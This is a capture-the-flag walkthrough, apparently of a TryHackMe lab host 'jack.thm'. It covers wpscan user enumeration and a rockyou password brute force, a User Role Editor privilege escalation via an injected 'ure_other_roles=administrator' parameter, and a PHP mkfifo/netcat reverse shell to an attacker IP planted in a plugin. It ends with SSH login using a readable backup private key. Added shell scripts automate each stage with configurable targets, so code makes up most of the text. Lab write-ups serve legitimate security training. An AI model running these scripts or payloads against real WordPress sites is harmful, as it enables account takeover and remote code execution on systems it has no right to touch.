Nmap Results

Nmap scan report for jack.thm (10.10.216.42)
Host is up (0.048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3e:79:78:08:93:31:d0:83:7f:e2:bc:b6:14:bf:5d:9b (RSA)
|   256 3a:67:9f:af:7e:66:fa:e3:f8:c7:54:49:63:38:a2:93 (ECDSA)
|_  256 8c:ef:55:b0:23:73:2c:14:09:45:22:ac:84:cb:40:d2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/16%OT=22%CT=1%CU=39072%PV=Y%DS=2%DC=T%G=Y%TM=5F105C9
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST1
OS:1NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add jack.thm to /etc/hosts and take a look at the site. You can dirbust if you want, but the nmap scan already tells us what we need: robots.txt disallows /wp-admin/ and http-generator reports WordPress 5.3.2, so this is a WordPress site. Run wpscan against it, enumerating users (u) and all plugins (ap):

wpscan --url jack.thm -e u,ap

That gives us a list of usernames. Save them one per line in a file called user.txt, then use wpscan's password attack to brute-force those users against rockyou.txt:

wpscan -U user.txt -P /usr/share/wordlists/rockyou.txt --url jack.thm

After a long run it finds a valid pair: wendy:changelater
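The enumeration and brute-force steps above, chained into one script. This is an added example, not code from the original writeup. It assumes the target http://jack.thm, the rockyou.txt path used above, and wpscan's CLI report format, in which enumerated users appear as "[+] name" lines under an "[i] User(s) Identified:" header; the report fragment embedded in it is constructed for testing the parser offline.

```shell
#!/bin/sh
# Added example: chains the wpscan user enumeration and password attack.
# Assumptions: target http://jack.thm, wordlist path below, and wpscan's CLI
# report listing enumerated users as "[+] name" lines under
# "[i] User(s) Identified:".
TARGET=${TARGET:-http://jack.thm}
WORDLIST=${WORDLIST:-/usr/share/wordlists/rockyou.txt}

# Extract usernames from a wpscan CLI report on stdin, one per line.
# Stops at the next section header so plugin names and "[+] Finished:"
# are not mistaken for users.
wpscan_users() {
  awk '
    /User\(s\) Identified:/          { in_users = 1; next }
    in_users && /^\[[!i]\]/          { in_users = 0 }
    in_users && /^\[\+\] Finished:/  { in_users = 0 }
    in_users && /^\[\+\] /           { print $2 }
  '
}

# Constructed sample of a report, used to check the parser offline.
SAMPLE_REPORT='[i] Plugin(s) Identified:

[+] user-role-editor
 | Location: http://jack.thm/wp-content/plugins/user-role-editor/

[i] User(s) Identified:

[+] wendy
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jack
 | Found By: Wp Json Api (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[+] Finished: Thu Jul 16 12:00:00 2020'

# Full flow: enumerate, build user.txt, then run the password attack.
run_attack() {
  wpscan --url "$TARGET" -e u,ap -f cli-no-colour -o wpscan-enum.txt
  wpscan_users < wpscan-enum.txt > user.txt
  echo "[*] Attacking $(wc -l < user.txt) user(s) with $WORDLIST"
  wpscan --url "$TARGET" -U user.txt -P "$WORDLIST" -f cli-no-colour -o wpscan-brute.txt
  # Hits are reported under "Valid Combinations Found:" as
  # " | Username: X, Password: Y" lines.
  grep -A5 'Valid Combinations Found' wpscan-brute.txt
}

case "${1:-}" in
  --run) run_attack ;;                                   # live run against $TARGET
  *)     printf '%s\n' "$SAMPLE_REPORT" | wpscan_users ;; # offline: parse the sample
esac
```

Run it with `--run` for the live attack; without arguments it only parses the constructed sample, which is handy for checking the parser before pointing it at a real report.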

For privilege escalation inside WordPress we can't just upload a reverse shell: wendy's role doesn't allow installing or editing plugins. The hint for the user flag is ure_other_roles, which is a parameter of the User Role Editor plugin. Searching for that parameter turns up a known privilege escalation: the plugin applies whatever roles are passed in ure_other_roles when a profile is saved, without checking that the user is allowed to assign them. So log in as wendy, go to Profile, turn on Burp's intercept, change the bio and click Update Profile, and when the POST to /wp-admin/profile.php shows up in the proxy, append one parameter to the end of the request body to get administrator privileges.


Append this at the very end of the POST body:

&ure_other_roles=administrator
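The same request, reproduced with curl instead of Burp so the whole chain (login, fetch the profile form, replay it with the extra parameter) can be scripted. This is an added example, not the writeup's own code. It assumes the target http://jack.thm, the wendy:changelater credentials found above, and the inputs WordPress renders on /wp-admin/profile.php (_wpnonce, user_id, nickname, email); the HTML fragment embedded in it is constructed for testing the extractor offline.

```shell
#!/bin/sh
# Added example: the Burp step as a curl script.
# Assumptions: target http://jack.thm, creds from the writeup, and the form fields
# WordPress renders on /wp-admin/profile.php. WordPress core ignores unknown POST
# fields, so the only change to the real form submission is the appended parameter.
TARGET=${TARGET:-http://jack.thm}
WP_USER=${WP_USER:-wendy}
WP_PASS=${WP_PASS:-changelater}

# Value of the first <input ... name="$1" ... value="..."> in HTML read from stdin.
extract_input() {
  sed -n "s/.*name=\"$1\"[^>]*value=\"\([^\"]*\)\".*/\1/p" | head -n 1
}

# Constructed fragment of a profile page, used to check the extractor offline.
SAMPLE_FORM='<form id="your-profile" action="profile.php" method="post">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="a1b2c3d4e5" />
<input type="hidden" name="user_id" id="user_id" value="2" />
<input type="text" name="nickname" id="nickname" value="wendy" class="regular-text" />
<input type="email" name="email" id="email" value="wendy@jack.thm" class="regular-text ltr" />'

escalate() {
  jar=$(mktemp)
  # 1. wp-login.php sets its test cookie on GET and checks it on POST.
  curl -s -c "$jar" -o /dev/null "$TARGET/wp-login.php"
  curl -s -b "$jar" -c "$jar" -o /dev/null \
       --data-urlencode "log=$WP_USER" --data-urlencode "pwd=$WP_PASS" \
       -d 'wp-submit=Log+In' -d 'testcookie=1' "$TARGET/wp-login.php"
  # 2. Fetch the profile form for the nonce and the fields edit_user() requires.
  page=$(curl -s -b "$jar" "$TARGET/wp-admin/profile.php")
  nonce=$(printf '%s' "$page" | extract_input _wpnonce)
  uid=$(printf '%s' "$page" | extract_input user_id)
  nick=$(printf '%s' "$page" | extract_input nickname)
  mail=$(printf '%s' "$page" | extract_input email)
  [ -n "$nonce" ] && [ -n "$uid" ] || { echo "[-] login or form parse failed"; rm -f "$jar"; return 1; }
  # 3. The POST Burp would forward, with the injected parameter at the end.
  curl -s -b "$jar" -o /dev/null -w 'profile update: HTTP %{http_code}\n' \
       --data-urlencode "_wpnonce=$nonce" -d '_wp_http_referer=/wp-admin/profile.php' \
       -d 'from=profile' -d "checkuser_id=$uid" -d 'action=update' -d "user_id=$uid" \
       --data-urlencode "nickname=$nick" --data-urlencode "email=$mail" \
       -d 'ure_other_roles=administrator' "$TARGET/wp-admin/profile.php"
  # 4. Check: an administrator gets 200 on plugin-install.php, a subscriber a 403 wp_die page.
  curl -s -b "$jar" -o /dev/null -w 'plugin-install: HTTP %{http_code}\n' \
       "$TARGET/wp-admin/plugin-install.php"
  rm -f "$jar"
}

case "${1:-}" in --run) escalate ;; esac
```

Without `--run` nothing touches the network. The profile update itself normally answers with a redirect back to profile.php, so the status line to watch is the second one: 200 on plugin-install.php means the role was applied.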

Now that we have administrator privileges, add a reverse shell to a plugin through Plugins > Plugin Editor. Any plugin will do; I used the first one in the list and put the payload at the top of its main file:

<?php /* 10.0.0.1:1234 is the attacker's listener: change it to your own IP and port */ system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f"); ?>

Then go to Installed Plugins and activate that plugin while listening with netcat on the port from the payload. A shell comes back as www-data. Upgrade it to a proper TTY with Python's pty module, then go to /home/jack: user.txt is readable there, and so is reminder.txt, which mentions a backup folder. Let's locate it:

locate backups

cd into /var/backups: there is an id_rsa private key in there that www-data can read. Copy it over to our machine, chmod 600 the file (ssh refuses to use a private key that other users can read), and log in as jack with it:

ssh -i key jack@<ip>
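The post-exploitation steps above as a small set of shell helpers. This is an added example and not part of the original writeup; it assumes the 10.0.0.1:1234 listener from the payload above and the /var/backups location named in reminder.txt, and it generalises the last step slightly by searching a directory for any world-readable private key rather than only /var/backups/id_rsa.

```shell
#!/bin/sh
# Added example: post-exploitation helpers for the www-data shell.
# Assumptions: attacker listener 10.0.0.1:1234 (from the payload above) and the
# /var/backups directory named in the writeup.

# On the attacker box, before clicking Activate:
#   nc -lvnp 1234
# In the www-data shell that comes back, get a real TTY (python or python3,
# whichever the target has), then background it and fix the local terminal:
#   python3 -c 'import pty; pty.spawn("/bin/bash")'
#   Ctrl-Z; stty raw -echo; fg

# List private-key-looking files under $1 that are readable by everyone.
# A world-readable key sitting in a backup directory is the misconfiguration here.
find_readable_keys() {
  find "$1" -type f \( -name 'id_*' -o -name '*.pem' -o -name '*.key' \) \
       ! -name '*.pub' -perm -004 2>/dev/null
}

# Move the key without paste mangling: on the target run
#   base64 /var/backups/id_rsa
# and save the output locally as key.b64, then decode it into a 0600 file.
decode_key() {  # $1 = file holding the base64 text, $2 = output key path
  base64 -d "$1" > "$2" && chmod 600 "$2"
}

# ssh rejects a key with "UNPROTECTED PRIVATE KEY FILE" unless it is owner-only.
key_perms_ok() {
  [ "$(ls -ld "$1" | cut -c2-10)" = "rw-------" ]
}

# Connect as jack with the recovered key; IdentitiesOnly stops ssh offering
# every key in the agent first.
use_key() {  # $1 = key path, $2 = target host
  key_perms_ok "$1" || chmod 600 "$1"
  ssh -i "$1" -o IdentitiesOnly=yes "jack@$2"
}

case "${1:-}" in
  --scan) find_readable_keys "${2:-/var/backups}" ;;  # run this on the target
  --ssh)  use_key "${2:-key}" "${3:-jack.thm}" ;;     # run this on the attacker box
esac
```

`--scan` is meant to be pasted into the www-data shell (it prints candidate keys the web user can read); `--ssh` runs locally once the key has been decoded.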